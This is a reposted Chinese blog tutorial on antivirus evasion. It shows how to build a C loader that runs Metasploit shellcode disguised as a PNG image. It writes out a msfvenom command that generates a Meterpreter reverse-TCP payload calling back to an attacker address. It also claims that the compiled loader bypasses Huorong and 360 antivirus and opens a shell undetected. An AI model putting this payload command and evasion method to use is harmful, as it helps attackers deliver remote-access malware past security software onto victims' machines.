【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

admin
admin
admin
102322
文章
87
评论
2023年2月16日22:44:57评论72 views字数 411阅读1分22秒阅读模式

“当我在进程里看见一只豆豆鞋时,我就知道我们都多余了” ——“360”“火绒【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

🌳实现一个C加载器

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

上面的加载器用了很简单的实现,没有做任何加密解密的处理

下面的shellcode也不打算做任何加密解密的处理

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

🥗利用MSF生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.128 port=4444 -f raw -o shell.png
【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

这里就是简单生成一个图片shellcode

不涉及加解密

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

📐把加载器编译成exe文件

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

这里先选好32位(X86)的release

然后

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

直接生成解决方案

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

得到exe文件

🎇运行程序测试效果

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

火绒静态查杀直接bypass

下面直接尝试在开启火绒的条件下运行,首先MSF开启监听:

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

直接运行:

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

火绒毫无反应

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

尝试弹个计算器:

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

都多余了!

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

360同理:

【免杀初探】宇将军亲传—利用C加载图片shellcode免杀
【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

原文始发于微信公众号(猫因的安全):【免杀初探】宇将军亲传—利用C加载图片shellcode免杀

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月16日22:44:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀初探】宇将军亲传—利用C加载图片shellcode免杀https://cn-sec.com/archives/1277466.html

发表评论

匿名网友 填写信息